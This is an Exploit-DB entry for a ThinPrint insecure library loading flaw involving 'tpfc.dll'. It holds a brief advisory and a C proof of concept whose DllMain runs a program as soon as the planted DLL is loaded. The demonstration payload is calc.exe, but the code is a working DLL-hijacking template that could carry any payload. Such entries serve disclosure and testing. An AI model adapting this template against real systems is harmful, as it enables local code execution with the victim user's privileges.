ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution

EDB-ID:

37780




Platform:

Windows

Date:

2012-09-04


// source: https://www.securityfocus.com/bid/55421/info

ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.

Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application. 

#include <windows.h> 

	int hijack_poc () 
	{ 
	  WinExec ( "calc.exe" , SW_NORMAL );
	  return 0 ; 
	} 
	  
	BOOL WINAPI DllMain 
		 (	HINSTANCE hinstDLL , 
			DWORD dwReason ,
			LPVOID lpvReserved ) 
	{ 
	  hijack_poc () ;
	  return 0 ;
	}